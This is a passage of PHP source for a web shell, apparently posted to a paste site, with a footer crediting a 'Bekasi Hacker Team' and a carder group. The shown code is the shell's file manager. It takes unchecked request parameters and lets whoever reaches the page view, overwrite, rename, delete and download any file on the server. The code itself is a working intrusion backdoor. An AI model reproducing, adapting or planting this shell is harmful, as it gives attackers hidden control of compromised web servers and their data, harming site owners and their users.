  1291. <input type='submit' name='new_save_folder' value='Submit'>
  1292. </form>";
  1293. } elseif($_GET['act'] == 'rename_dir') {
  1294. if($_POST['dir_rename']) {
  1295. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  1296. if($dir_rename) {
  1297. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1298. } else {
  1299. $act = "<font color=red>permission denied</font>";
  1300. }
  1301. echo "".$act."<br>";
  1302. }
  1303. echo "<form method='post'>
  1304. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  1305. <input type='submit' name='dir_rename' value='rename'>
  1306. </form>";
  1307. } elseif($_GET['act'] == 'delete_dir') {
  1308. $delete_dir = rmdir($dir);
  1309. if($delete_dir) {
  1310. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  1311. } else {
  1312. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  1313. }
  1314. echo $act;
  1315. } elseif($_GET['act'] == 'view') {
  1316. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1317. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  1318. } elseif($_GET['act'] == 'edit') {
  1319. if($_POST['save']) {
  1320. $save = file_put_contents($_GET['file'], $_POST['src']);
  1321. if($save) {
  1322. $act = "<font color=white>Saved!</font>";
  1323. } else {
  1324. $act = "<font color=red>permission denied</font>";
  1325. }
  1326. echo "".$act."<br>";
  1327. }
  1328. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1329. echo "<form method='post'>
  1330. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  1331. <input type='submit' value='Save' name='save' style='width: 500px;'>
  1332. </form>";
  1333. } elseif($_GET['act'] == 'rename') {
  1334. if($_POST['do_rename']) {
  1335. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  1336. if($rename) {
  1337. $act = "<script>window.location='?dir=".$dir."';</script>";
  1338. } else {
  1339. $act = "<font color=red>permission denied</font>";
  1340. }
  1341. echo "".$act."<br>";
  1342. }
  1343. echo "Filename: <font color=white>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  1344. echo "<form method='post'>
  1345. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  1346. <input type='submit' name='do_rename' value='rename'>
  1347. </form>";
  1348. } elseif($_GET['act'] == 'delete') {
  1349. $delete = unlink($_GET['file']);
  1350. if($delete) {
  1351. $act = "<script>window.location='?dir=".$dir."';</script>";
  1352. } else {
  1353. $act = "<font color=red>permission denied</font>";
  1354. }
  1355. echo $act;
  1356. } elseif(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
  1357. @ob_clean();
  1358. $file = $_GET['file'];
  1359. header('Content-Description: File Transfer');
  1360. header('Content-Type: application/octet-stream');
  1361. header('Content-Disposition: attachment; filename="'.basename($file).'"');
  1362. header('Expires: 0');
  1363. header('Cache-Control: must-revalidate');
  1364. header('Pragma: public');
  1365. header('Content-Length: ' . filesize($file));
  1366. readfile($file);
  1367. exit;
  1368. } else {
  1369. if(is_dir($dir) == true) {
  1370. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  1371. <tr>
  1372. <th class="th_home"><center>Name</center></th>
  1373. <th class="th_home"><center>Type</center></th>
  1374. <th class="th_home"><center>Size</center></th>
  1375. <th class="th_home"><center>Last Modified</center></th>
  1376. <th class="th_home"><center>Permission</center></th>
  1377. <th class="th_home"><center>Action</center></th>
  1378. </tr>';
  1379. $scandir = scandir($dir);
  1380. foreach($scandir as $dirx) {
  1381. $dtype = filetype("$dir/$dirx");
  1382. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  1383. if(!is_dir("$dir/$dirx")) continue;
  1384. if($dirx === '..') {
  1385. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  1386. } elseif($dirx === '.') {
  1387. $href = "<a href='?dir=$dir'>$dirx</a>";
  1388. } else {
  1389. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  1390. }
  1391. if($dirx === '.' || $dirx === '..') {
  1392. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  1393. } else {
  1394. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  1395. }
  1396. echo "<tr>";
  1397. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  1398. echo "<td class='td_home'><center>$dtype</center></td>";
  1399. echo "<td class='td_home'><center>-</center></th>";
  1400. echo "<td class='td_home'><center>$dtime</center></td>";
  1401. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  1402. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  1403. }
  1404. echo "</tr>";
  1405. foreach($scandir as $file) {
  1406. $ftype = filetype("$dir/$file");
  1407. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  1408. $size = filesize("$dir/$file")/1024;
  1409. $size = round($size,3);
  1410. if($size > 1024) {
  1411. $size = round($size/1024,2). 'MB';
  1412. } else {
  1413. $size = $size. 'KB';
  1414. }
  1415. if(!is_file("$dir/$file")) continue;
  1416. echo "<tr>";
  1417. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  1418. echo "<td class='td_home'><center>$ftype</center></td>";
  1419. echo "<td class='td_home'><center>$size</center></td>";
  1420. echo "<td class='td_home'><center>$ftime</center></td>";
  1421. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  1422. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  1423. }
  1424. echo "</tr></table><hr>";
  1425. } else {
  1426. echo "<font color=red>can't open directory</font>";
  1427. }
  1428. echo'
  1429. </td></tr></table>
  1430. <center><font style="color:white;font size:8px;text-align: center;font-family:Pirata One;text-shadow: 0 0 3px #0000FF, 0px 0px 5px #00FFFF,0 0 5px #00FFFF,0 0 5px aqua;"><font face="Pirata One" color=red size=5></font>
  1431. <footer id="det" style="position:fixed; left:0px; right:0px; bottom:0px; background:transparent; border-top: 1px solid aqua; border-bottom: 1px solid aqua"><font style="font:20px courier;color:#FF0000;"><font style="font:17px courier;color:aqua;"><b>Greetz :</b></font></font><font face="Tahoma" size="4" color="Red">[</font><font face="Courier" size="4" color="aqua"><b><marquee scrollamount="5" scrolldelay="50" width="85%"> ~ Bekasi X Code ~ Bekasi Hacker Team ~ Bekasi Carder Link ~ Bekasi Jones Attacker ~ Jannine Weigel Fans Indonesian ~ </b> </marquee></foottyle="margin: 0px; padding: 0px"></font><font face="Tahoma" size="4" color="Red">]</font><style>
  1432. </body>
  1433. </html>';
  1434. }
  1435. ?>
  1436. </html>
Add Comment
Please, Sign In to add comment